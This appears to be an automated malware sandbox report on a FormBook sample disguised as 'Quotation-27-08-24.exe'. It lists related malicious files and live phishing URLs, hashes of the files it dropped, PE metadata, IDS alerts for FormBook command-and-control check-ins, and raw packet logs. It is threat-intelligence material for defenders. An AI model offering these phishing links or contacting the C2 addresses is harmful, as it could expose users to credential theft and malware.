                                        http://masami-omori.com/Get hashmaliciousHTMLPhisherBrowse
                                        • 157.7.107.57
                                        PURCHASE ORDER_330011 SEPTEMBER 2024.exeGet hashmaliciousFormBookBrowse
                                        • 160.251.148.115
                                        ExeFile (267).exeGet hashmaliciousEmotetBrowse
                                        • 157.7.164.178
                                        ExeFile (333).exeGet hashmaliciousEmotetBrowse
                                        • 157.7.164.178
                                        ExeFile (377).exeGet hashmaliciousEmotetBrowse
                                        • 157.7.164.178
                                        ExeFile (388).exeGet hashmaliciousEmotetBrowse
                                        • 157.7.164.178
                                        ExeFile (39).exeGet hashmaliciousEmotetBrowse
                                        • 157.7.164.178
                                        ExeFile (64).exeGet hashmaliciousEmotetBrowse
                                        • 157.7.164.178
                                        ExeFile (285).exeGet hashmaliciousEmotetBrowse
                                        • 157.7.164.178
                                        NEXINTO-DE031215-Revised-01.exeGet hashmaliciousFormBookBrowse
                                        • 194.233.65.154
                                        Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
                                        • 194.233.65.154
                                        RCZ-PI-4057.exeGet hashmaliciousFormBookBrowse
                                        • 194.233.65.154
                                        APS-0240226.exeGet hashmaliciousFormBookBrowse
                                        • 194.233.65.154
                                        Shipping document_pdf.exeGet hashmaliciousFormBookBrowse
                                        • 194.233.65.154
                                        arm.elfGet hashmaliciousMiraiBrowse
                                        • 212.229.153.86
                                        77.90.35.9-skid.arm-2024-07-30T07_10_51.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 212.229.18.16
                                        TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                                        • 194.195.220.41
                                        rf4LFk7Nvv.elfGet hashmaliciousMiraiBrowse
                                        • 194.195.1.127
                                        WIwTo1UTMq.elfGet hashmaliciousMiraiBrowse
                                        • 195.180.12.62
                                        UNIFIEDLAYER-AS-1USElectronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                                        • 69.49.245.172
                                        https://tjh.kyx.mybluehost.me/wise/number-account-184049/pages/login.phpGet hashmaliciousUnknownBrowse
                                        • 162.241.30.80
                                        Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                                        • 69.49.245.172
                                        https://service.clearservice.com/constructionns/track/link.jsp?id1=7962783&id2=1118626513&link=https://watercolorjourney.net/afew/ribs.htmlGet hashmaliciousUnknownBrowse
                                        • 162.241.87.113
                                        https://subwaypay.brgsistemas.com.br/ogk2/Magenta/Get hashmaliciousPhisherBrowse
                                        • 192.185.210.56
                                        QUOTATION_AUGQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 198.57.247.184
                                        DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                        • 198.57.245.28
                                        http://christianetresca.com.br/christiamewetransee/wetransffeeee-sslh0409-red-rectfy/download-files.html?email=s..*@p.......*.comGet hashmaliciousUnknownBrowse
                                        • 192.185.215.85
                                        OneDriveInvoice73391.pdfGet hashmaliciousUnknownBrowse
                                        • 162.241.114.35
                                        SecuriteInfo.com.BackDoor.SpyBotNET.75.13901.13013.exeGet hashmaliciousAgentTeslaBrowse
                                        • 192.185.13.234
                                        AMAZON-02USPayment Details Swift copy.exeGet hashmaliciousFormBookBrowse
                                        • 76.223.67.189
                                        INVG0088 LHV3495264 BL327291535V.exeGet hashmaliciousFormBookBrowse
                                        • 13.248.169.48
                                        #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 76.223.54.146
                                        LinhasSumarizadas_2022067095.ppamGet hashmaliciousRevengeRATBrowse
                                        • 18.228.165.84
                                        OmnibeesReservas_2022067095.ppamGet hashmaliciousRevengeRATBrowse
                                        • 18.228.165.84
                                        https://messaging-security.comano.us/XdEtiQ3I4emJ5ZldQUWF3SmcwOEQ4cURsb24rSWYyY2loVzV5bktYMlpLSlVxalNnL1RabENaQmozTzkvS3FhK1Z5ZTJDZHlNa1VGbnJDL1g3ZHBLdXdYNUJJbXVhckp5RmFuam41SWhoR0tQUTVWSmNSeEdVdXp3ZmV3eksreWs4dlFnVTBqZG8xUDdFZU9sN1JGZUNtUGdHQnZsVVJLRHREbFNUQm54UWtMa3dmdFNwVENxQTRLaFh3PT0tLUd4TXFReTErSUVBOTZZdDQtLWFZbmE1c254RWIwVWNyTkhyVHN0TUE9PQ==?cid=2140479915Get hashmaliciousUnknownBrowse
                                        • 52.217.205.32
                                        LinhasSumarizadas_2022067095.ppamGet hashmaliciousRevengeRATBrowse
                                        • 18.228.165.84
                                        http://constructivesoftware.com.auGet hashmaliciousUnknownBrowse
                                        • 13.35.58.117
                                        SALARY OF AUG 2024.exeGet hashmaliciousFormBookBrowse
                                        • 13.248.243.5
                                        https://buy-korea-online-f85b.vercel.app/?web=seunghun.lee@hdel.co.krGet hashmaliciousUnknownBrowse
                                        • 76.76.21.93

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quotation-27-08-24.exe.log

                                        Download File
                                        Process:C:\Users\user\Desktop\Quotation-27-08-24.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.34331486778365
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                        C:\Users\user\AppData\Local\Temp\Z426iIL7

                                        Download File
                                        Process:C:\Windows\SysWOW64\PING.EXE
                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                        Category:dropped
                                        Size (bytes):196608
                                        Entropy (8bit):1.1239949490932863
                                        Encrypted:false
                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                        MD5:271D5F995996735B01672CF227C81C17
                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.758373728867409
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:Quotation-27-08-24.exe
                                        File size:833'536 bytes
                                        MD5:fcb6844bca1d8d2a4c41025b08a50799
                                        SHA1:524dd948b1f08b4f64da958439e7c0e42b542c72
                                        SHA256:866dc796d2727a535d138d80a3196c82dfefb4c38ac6b51f8c81ca381e035f45
                                        SHA512:845481d033ee5db7ba52996b55e3a42d0982e72abbb0121172fd47de015a99821ca69b8c08c4e552857bc62103f6fe9037ae555dece5a12a0cbfc99147d9b481
                                        SSDEEP:24576:QgGHejBt2aAX1RZDyM1EpBiq3df/WQvxt3:A+1t2TX1Rh23N7vT
                                        TLSH:A905E1D43721735ECD62C831DA68EC7196A01C7AB206B6E394DB374B794C5A2DF08F92
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0.............~.... ........@.. ....................... ............@................................

                                        File Icon

                                        Icon Hash:939393939393b3b3

                                        Static PE Info

                                        General

                                        Entrypoint:0x4cc57e
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x66CD0DE0 [Mon Aug 26 23:21:04 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xcc52c0x4f.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xce0000xcb8.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xd00000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000xca5840xca60062ea09d63fa62655e2417f80680c7bdfFalse0.8861034975293391data7.7665587747016405IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0xce0000xcb80xe00b173a1f92a95db4a1e4eb7f449616600False0.41685267857142855data4.983802667841656IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0xd00000xc0x20038a8cab0025043f008a9d55ddf74120eFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0xce0e80x83aPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.49002849002849
                                        RT_GROUP_ICON0xce9240x14data1.05
                                        RT_VERSION0xce9380x380data0.42299107142857145

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                        2024-08-27T08:44:26.541690+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315124080192.168.2.6199.59.243.226
                                        2024-08-27T08:42:49.521662+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315120980192.168.2.685.159.66.93
                                        2024-08-27T08:43:46.567181+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315122780192.168.2.6162.0.239.141
                                        2024-08-27T08:42:57.183106+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M515121280192.168.2.685.159.66.93
                                        2024-08-27T08:42:57.183106+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M215121280192.168.2.685.159.66.93
                                        2024-08-27T08:42:36.019010+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315120580192.168.2.6119.28.49.194
                                        2024-08-27T08:44:38.435901+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315124380192.168.2.6157.7.44.213
                                        2024-08-27T08:44:15.775623+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315123680192.168.2.684.32.84.32
                                        2024-08-27T08:42:24.196227+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315120180192.168.2.6194.58.112.174
                                        2024-08-27T08:42:08.195658+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315119580192.168.2.684.32.84.32
                                        2024-08-27T08:44:31.613794+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M515124280192.168.2.6199.59.243.226
                                        2024-08-27T08:44:31.613794+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M215124280192.168.2.6199.59.243.226
                                        2024-08-27T08:42:10.730161+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315119680192.168.2.684.32.84.32
                                        2024-08-27T08:44:10.668172+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315123480192.168.2.684.32.84.32
                                        2024-08-27T08:44:00.020291+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315123180192.168.2.613.248.169.48
                                        2024-08-27T08:45:06.261507+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315125180192.168.2.6172.67.220.161
                                        2024-08-27T08:44:54.707852+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315124880192.168.2.6162.240.81.18
                                        2024-08-27T08:44:29.065496+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315124180192.168.2.6199.59.243.226
                                        2024-08-27T08:42:52.052772+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315121080192.168.2.685.159.66.93
                                        2024-08-27T08:44:02.569669+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315123280192.168.2.613.248.169.48
                                        2024-08-27T08:43:49.164447+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315122880192.168.2.6162.0.239.141
                                        2024-08-27T08:44:05.125859+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M515123380192.168.2.613.248.169.48
                                        2024-08-27T08:44:05.125859+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M215123380192.168.2.613.248.169.48
                                        2024-08-27T08:43:44.030522+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315122680192.168.2.6162.0.239.141
                                        2024-08-27T08:43:08.827240+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315121580192.168.2.63.33.130.190
                                        2024-08-27T08:44:40.939929+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315124480192.168.2.6157.7.44.213
                                        2024-08-27T08:42:26.760478+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315120280192.168.2.6194.58.112.174
                                        2024-08-27T08:45:08.777695+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315125280192.168.2.6172.67.220.161
                                        2024-08-27T08:43:30.551260+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315122280192.168.2.6172.96.186.147
                                        2024-08-27T08:44:46.077884+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M515124680192.168.2.6157.7.44.213
                                        2024-08-27T08:44:46.077884+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M215124680192.168.2.6157.7.44.213
                                        2024-08-27T08:43:35.764514+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315122480192.168.2.6172.96.186.147
                                        2024-08-27T08:43:33.118522+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315122380192.168.2.6172.96.186.147
                                        2024-08-27T08:43:51.708015+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M515122980192.168.2.6162.0.239.141
                                        2024-08-27T08:43:51.708015+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M215122980192.168.2.6162.0.239.141
                                        2024-08-27T08:43:19.474680+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315121980192.168.2.6194.195.220.41
                                        2024-08-27T08:44:52.159002+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315124780192.168.2.6162.240.81.18
                                        2024-08-27T08:43:11.244131+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M515121780192.168.2.63.33.130.190
                                        2024-08-27T08:43:11.244131+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M215121780192.168.2.63.33.130.190
                                        2024-08-27T08:42:41.157921+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315120780192.168.2.6119.28.49.194
                                        2024-08-27T08:43:38.193354+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M515122580192.168.2.6172.96.186.147
                                        2024-08-27T08:43:38.193354+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M215122580192.168.2.6172.96.186.147
                                        2024-08-27T08:44:18.320148+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M515123780192.168.2.684.32.84.32
                                        2024-08-27T08:44:18.320148+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M215123780192.168.2.684.32.84.32
                                        2024-08-27T08:44:13.244665+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315123580192.168.2.684.32.84.32
                                        2024-08-27T08:44:57.244827+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315124980192.168.2.6162.240.81.18
                                        2024-08-27T08:44:23.968939+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315123980192.168.2.6199.59.243.226
                                        2024-08-27T08:43:02.685066+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315121380192.168.2.63.33.130.190
                                        2024-08-27T08:42:29.261096+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M515120480192.168.2.6194.58.112.174
                                        2024-08-27T08:42:29.261096+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M215120480192.168.2.6194.58.112.174
                                        2024-08-27T08:43:24.580528+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M515122180192.168.2.6194.195.220.41
                                        2024-08-27T08:43:24.580528+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M215122180192.168.2.6194.195.220.41
                                        2024-08-27T08:43:06.164860+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315121480192.168.2.63.33.130.190
                                        2024-08-27T08:42:54.626100+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315121180192.168.2.685.159.66.93
                                        2024-08-27T08:42:15.821716+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M515119880192.168.2.684.32.84.32
                                        2024-08-27T08:42:15.821716+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M215119880192.168.2.684.32.84.32
                                        2024-08-27T08:42:21.628008+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315119980192.168.2.6194.58.112.174
                                        2024-08-27T08:42:13.269307+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315119780192.168.2.684.32.84.32
                                        2024-08-27T08:41:52.626113+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M515119380192.168.2.692.204.210.213
                                        2024-08-27T08:41:52.626113+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M215119380192.168.2.692.204.210.213
                                        2024-08-27T08:43:57.481759+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315123080192.168.2.613.248.169.48
                                        2024-08-27T08:44:59.821052+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M515125080192.168.2.6162.240.81.18
                                        2024-08-27T08:44:59.821052+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M215125080192.168.2.6162.240.81.18
                                        2024-08-27T08:42:43.687957+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M515120880192.168.2.6119.28.49.194
                                        2024-08-27T08:42:43.687957+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M215120880192.168.2.6119.28.49.194
                                        2024-08-27T08:43:16.913156+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315121880192.168.2.6194.195.220.41
                                        2024-08-27T08:44:43.481585+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315124580192.168.2.6157.7.44.213
                                        2024-08-27T08:42:38.569834+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315120680192.168.2.6119.28.49.194
                                        2024-08-27T08:43:22.022426+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315122080192.168.2.6194.195.220.41

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Aug 27, 2024 08:41:50.878426075 CEST5119380192.168.2.692.204.210.213
                                        Aug 27, 2024 08:41:50.888386965 CEST805119392.204.210.213192.168.2.6
                                        Aug 27, 2024 08:41:50.888561964 CEST5119380192.168.2.692.204.210.213
                                        Aug 27, 2024 08:41:50.896219969 CEST5119380192.168.2.692.204.210.213
                                        Aug 27, 2024 08:41:50.901225090 CEST805119392.204.210.213192.168.2.6
                                        Aug 27, 2024 08:41:52.625930071 CEST805119392.204.210.213192.168.2.6
                                        Aug 27, 2024 08:41:52.625977993 CEST805119392.204.210.213192.168.2.6
                                        Aug 27, 2024 08:41:52.626043081 CEST805119392.204.210.213192.168.2.6
                                        Aug 27, 2024 08:41:52.626077890 CEST805119392.204.210.213192.168.2.6
                                        Aug 27, 2024 08:41:52.626111984 CEST805119392.204.210.213192.168.2.6
                                        Aug 27, 2024 08:41:52.626112938 CEST5119380192.168.2.692.204.210.213
                                        Aug 27, 2024 08:41:52.626197100 CEST5119380192.168.2.692.204.210.213
                                        Aug 27, 2024 08:41:52.637907028 CEST5119380192.168.2.692.204.210.213
                                        Aug 27, 2024 08:41:52.642735958 CEST805119392.204.210.213192.168.2.6
                                        Aug 27, 2024 08:42:07.715327978 CEST5119580192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:07.720231056 CEST805119584.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:07.720325947 CEST5119580192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:07.731540918 CEST5119580192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:07.736411095 CEST805119584.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:08.195432901 CEST805119584.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:08.195657969 CEST5119580192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:09.233517885 CEST5119580192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:09.238550901 CEST805119584.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:10.252038956 CEST5119680192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:10.259088039 CEST805119684.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:10.259219885 CEST5119680192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:10.270353079 CEST5119680192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:10.275234938 CEST805119684.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:10.729948997 CEST805119684.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:10.730160952 CEST5119680192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:11.780210972 CEST5119680192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:11.784992933 CEST805119684.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:12.799360991 CEST5119780192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:12.804342985 CEST805119784.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:12.804507017 CEST5119780192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:12.815587044 CEST5119780192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:12.820550919 CEST805119784.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:12.820580006 CEST805119784.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:13.269174099 CEST805119784.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:13.269306898 CEST5119780192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:14.327502966 CEST5119780192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:14.332454920 CEST805119784.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:15.345786095 CEST5119880192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:15.350917101 CEST805119884.32.84.32192.168.2.6
                                        Aug 27, 2024 08:42:15.351016998 CEST5119880192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:15.358021975 CEST5119880192.168.2.684.32.84.32
                                        Aug 27, 2024 08:42:15.367033958 CEST805119884.32.84.32192.168.2.6
